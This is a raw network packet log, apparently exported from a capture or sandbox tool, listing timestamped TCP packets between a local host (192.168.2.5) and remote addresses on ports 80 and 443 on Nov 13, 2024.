Nov 13, 2024 20:39:49.510353088 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.510365009 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.510377884 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.510389090 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.510401964 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.510415077 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.510451078 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.510452032 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.510452032 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.510452032 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.510499954 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.510571003 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.510626078 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.510667086 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.510678053 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.510695934 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.510708094 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.510715961 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.510720968 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.510736942 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.510750055 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.510768890 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.511008978 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.511039972 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.511050940 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.511065006 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.511090994 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.511092901 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.511106968 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.511168957 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.511456013 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.511478901 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.511491060 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.511543036 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.511570930 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.511837959 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.511851072 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.511868000 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.511879921 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.511898994 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.511904955 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.511939049 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.511939049 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.587496996 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.587512970 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.587524891 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.587538004 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.587549925 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.587562084 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.587570906 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.587575912 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.587587118 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.587626934 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.587626934 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.603343010 CET	443	49940	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:49.603413105 CET	443	49940	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:49.603498936 CET	443	49940	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:49.603593111 CET	49940	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:49.603661060 CET	49940	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:49.603661060 CET	49940	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:49.603672028 CET	443	49940	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:49.603679895 CET	443	49940	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:49.607347965 CET	49946	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:49.607389927 CET	443	49946	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:49.607912064 CET	49946	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:49.608582973 CET	49946	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:49.608604908 CET	443	49946	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:49.615748882 CET	443	49939	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:49.616461992 CET	443	49939	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:49.616545916 CET	49939	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:49.616666079 CET	49939	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:49.616666079 CET	49939	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:49.616704941 CET	443	49939	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:49.616734982 CET	443	49939	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:49.619151115 CET	49947	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:49.619188070 CET	443	49947	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:49.619456053 CET	49947	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:49.619604111 CET	49947	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:49.619616032 CET	443	49947	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:49.628686905 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.628772020 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.628784895 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.628880024 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.628880024 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.628915071 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.628926992 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.628942013 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.628952980 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.628963947 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.629005909 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.629005909 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.629193068 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.629204988 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.629215002 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.629225969 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.629236937 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.629247904 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.629257917 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.629267931 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.629271030 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.629282951 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.629295111 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.629296064 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.629308939 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.629323006 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.629323006 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.629350901 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.630665064 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.630678892 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.630690098 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.630700111 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.630712032 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.630723000 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.630736113 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.630739927 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.630769968 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.630795956 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.631572008 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.631584883 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.631596088 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.631608009 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.631644011 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.631669044 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.705600023 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.705641031 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.705662012 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.705673933 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.705683947 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.705697060 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.705712080 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.705722094 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.705849886 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.705849886 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.744962931 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.744997978 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.745054007 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.745054007 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.745136023 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.745167971 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.745179892 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.745238066 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.745256901 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.745268106 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.745367050 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.745368004 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.745451927 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.745587111 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.745599031 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.745609999 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.745623112 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.745656967 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.745687008 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.745702028 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.745718002 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.745737076 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.745748043 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.745759964 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.745774984 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.745798111 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.745798111 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.745827913 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.746107101 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.746159077 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.746190071 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.746201992 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.746212959 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.746222973 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.746296883 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.746298075 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.746475935 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.746488094 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.746496916 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.746505976 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.746522903 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.746532917 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.746539116 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.746541977 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.746553898 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.746567965 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.746592045 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.746989012 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.747000933 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.747010946 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.747052908 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.747052908 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.747126102 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.747206926 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.747791052 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.748361111 CET	443	49941	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:49.749948978 CET	49941	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:49.749963045 CET	443	49941	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:49.750422001 CET	443	49941	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:49.751341105 CET	49941	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:49.751341105 CET	49941	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:49.751420975 CET	443	49941	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:49.775600910 CET	443	49942	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:49.775899887 CET	49942	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:49.775913000 CET	443	49942	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:49.776602030 CET	443	49942	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:49.776995897 CET	49942	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:49.777070045 CET	443	49942	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:49.777555943 CET	49942	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:49.792593002 CET	49941	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:49.819334030 CET	443	49942	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:49.822683096 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.822698116 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.822709084 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.822721958 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.822735071 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.822746038 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.822756052 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.822767973 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.822871923 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.822871923 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.822871923 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.862548113 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.862617970 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.862627029 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.862643003 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.862653971 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.862701893 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.862711906 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.862721920 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.862734079 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.862734079 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.862734079 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.862837076 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.862988949 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.863001108 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.863009930 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.863020897 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.863059044 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.863059044 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.863231897 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.863302946 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.863308907 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.863317013 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.863329887 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.863339901 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.863372087 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.863405943 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.863439083 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.863451004 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.863460064 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.863511086 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.863609076 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.863660097 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.863662004 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.863673925 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.863683939 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.863725901 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.863904953 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.863959074 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.863965988 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.863981962 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.864020109 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.864130020 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.864140987 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.864176035 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.864185095 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.864217043 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.864278078 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.864289999 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.864304066 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.864314079 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.864326000 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.864336014 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.864347935 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.864353895 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.864356995 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.864383936 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.864414930 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.877739906 CET	443	49941	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:49.877898932 CET	443	49941	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:49.878602028 CET	49941	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:49.879332066 CET	49941	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:49.879347086 CET	443	49941	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:49.907880068 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.907898903 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.908082962 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.908984900 CET	443	49942	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:49.909010887 CET	443	49942	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:49.909065008 CET	443	49942	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:49.909190893 CET	49942	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:49.909955025 CET	49942	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:49.910116911 CET	49942	443	192.168.2.5	13.107.246.57
Nov 13, 2024 20:39:49.910156965 CET	443	49942	13.107.246.57	192.168.2.5
Nov 13, 2024 20:39:49.940512896 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.940531969 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.940541983 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.940614939 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.940627098 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.940637112 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.940649986 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.940701962 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.940702915 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.940702915 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.940702915 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.940702915 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.940764904 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.940777063 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.940848112 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.940848112 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.979840994 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.979861021 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.979873896 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.979918003 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.979932070 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.979944944 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.980035067 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.980046034 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.980051994 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.980058908 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.980051994 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.980051994 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.980073929 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.980153084 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.980154037 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.980154037 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.980245113 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.980294943 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.980340004 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.980353117 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.980365992 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.980376959 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.980395079 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.980427980 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.980561018 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.980581045 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.980592012 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.980609894 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.980640888 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.980658054 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.980670929 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.980715036 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:49.980750084 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.980782986 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.980794907 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.980834007 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:49.980837107 CET	49873	80	192.168.2.5	185.215.113.206
